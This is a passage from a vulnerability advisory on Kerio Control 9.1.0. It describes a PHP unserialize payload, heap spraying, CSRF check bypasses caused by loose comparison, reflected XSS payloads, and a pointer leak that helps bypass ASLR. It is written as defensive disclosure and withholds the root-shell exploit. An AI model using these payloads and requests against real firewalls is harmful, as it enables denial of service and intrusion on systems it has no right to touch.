\nk_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:\"k_dbName\";s:5:\"error\";s:11:\"k_dbSummara\";s:3:\"abc\";s:14:\"k_dbIndividual\";s:3:\"abc\";s:16:\"k_dbLastUsedType\";s:3:\"abc\";s:10:\"k_dbLayout\";s:3:\"abc\";s:10:\"k_pageType\";s:3:\"abc\";s:13:\"k_periodStart\";i:123;s:11:\"k_periodEnd\";i:123;s:8:\"k_userId\";i:123;s:6:\"tabBar\";i:123;s:13:\"k_gotoElement\";i:123;s:9:\"k_protoId\";i:123;s:11:\"k_errorType\";i:123;s:16:\"k_timezoneOffset\";i:123;s:9:\"k_groupId\";i:123;s:2:\"id\";i:123;s:11:\"k_dbSummary\";C:16:\"SplObjectStorage\":152:{x:i:2;O:8:\"stdClass\":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:\"\\ff\\ff\\ff\\ff\\20\\00\\00\\00\\01\\00\\00\\00\\06\\00\\00\";i:1;R:3;}}s:18:\"k_historyTimestamp\";s:3:\"abc\";} \n \nThe following request will call unserialize on the injected data: \n \nGET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nIn the example above only a denial of service will be conducted. However, an \nattacker can change the data type to object to get full code execution on \nthe remote system. \n \nSEC Consult developed a fully working exploit for this attack which spawns a \nroot shell. Please note that this exploit was intentionally written to just \ntarget Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets \nare used which belong to the winroute binary with the SHA256 hash: \n2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0 \nThis exploit will not be released for now. \n \nA real-world-attacker can detect the remote binary version by bruteforcing \nthe object handler related to CVE-2014-3515. \n \n \n2) PHP script allows heap spraying \nThe set.php script contains the following code: \n$p_variable = urldecode($_POST['k_variable']); \n$p_value = urldecode($_POST['k_value']); \n... \n$p_session->setSessionVariable($p_variable, $p_value); \n \nPOST requests with the following parameters can therefore be used to allocate \nspace on the remote system: \nk_securityHash=x&target=k_sessionVariable&k_variable=<random_name> \n&k_value=<payload_to_allocate> \n \nDuring tests it was possible to spray approximately 400 MB data in 30 seconds \nwhich is enough to control two predictable addresses on the heap. \n \n \n3) CSRF Protection Bypass \nTwo scripts are required for the remote code execution exploit: \n-) set.php \n-) ContentLoader.php \nBoth scripts contain different very interesting CSRF check bypasses. \n \nThe following code can be found in set.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash']; \nif ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) { \nexit(); \n} \n \nSince the programming language is PHP (and not JavaScript), the above code code \ndoes not work as expected. $p_postedHash can only become 0 or 1 because || is a \nlogical operator. The if-condition compares the valid token with the posted one \nvia the != operator, however, this will not check if types are the same. \nIf k_securityHash is set (either via GET or POST) to any value, the above code \nwill compare the number 1 with a string, which will always bypass the check. \nIt's therefore enough to set k_securityHash to any value to bypass the CSRF \nprotection. \n \nThe following code can be found in contentLoader.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash']; \n... \nif (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) { \n$p_page = new p_Page(); \n$p_page->p_jsCode('window.top.location = \"index.php\";'); \n$p_page->p_showPageCode(); \ndie(); \n} \n \nNow the programmers only use the GET parameter, however, they changed the \nlogical operator in the if condition from || to && which means that the CSRF \ncheck will only be applied if $p_postedHash is empty. It's therefore again \nenough to set k_securityHash to any value to bypass the check. \n \n \n4) Webserver running with root privileges \nNo proof of concept necessary. \n \n \n5) Reflected Cross Site Scripting (XSS) \nIn the following request the k_historyTimestamp parameter is prone to XSS: \nhttps://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x \n&k_historyTimestamp=aa%22;alert(1)%3b// \n \nIn the same request the id parameter can be used to inject JavaScript code. \nNote that the attack can only be conducted against administrative users. \nUsers with standard privileges can only access pages with k_dbName set to one \nof the following values: \n-) accStats \n-) prefs \n-) dialup \n-) error \n \nIn such a case Kerio Control adds code like the following \n(in this example k_dbName=dialup): \nvar k_newDbName = \"<kerio:text id=\"tabCaption_dialup\"/>\"; \n \nThe \" characters within the string are not correctly encoded. \nThis will lead to the termination of the JavaScript execution. Because the \ninjected payload is stored after this code, the attacker must bypass this \ncode to ensure that the payload gets executed. This is only possible if \nthe attacked user is an administrator because administrators can load any \ndbName. By setting k_dbName to an invalid dbName (e.g. to 'x'), code like \nthe following will be added instead (which does not crash): \nvar k_newDbName = \"\"; \n \nAnother XSS can be found at: \nhttps://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A\"><script>alert(1);</script><!-- \n \n \n6) Missing memory corruption protections \nNo proof of concept necessary. \n \n \n7) Information Disclosure leads to ASLR bypass \nThe following request returns information to the currently logged in user \n(e.g. session token and username): \n \nGET /nonauth/getLoginType.js.php HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nThe following is a typical response: \n \nHTTP/1.1 200 OK \nConnection: Close \nContent-type: text/html \nDate: Tue, 24 Aug 2016 11:47:34 GMT \nServer: Kerio Control Embedded Web Server \nX-UA-Compatible: IE=edge \n \nk_loginParams.k_loginType = \"loginUnlock\";k_loginParams.k_nonauthToken = \n\"0xb59066a8\";k_loginParams.k_sessionToken = \n\"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660\";k_loginParams.k_loggedUser \n= {k_asocName: \"user\", k_fullName: \"user\"}; \n \nThe above response contains a valid pointer (0xb59066a8). In most cases this \npointer will point to the heap. However, sometimes this pointer will point \ninto a readable and writeable region behind a stack-region. \nThe target location always stores the same data. During the analysis no \nfurther effort was spent on analysing this behaviour. \n \nThe pointer will also be disclosed if the user is already l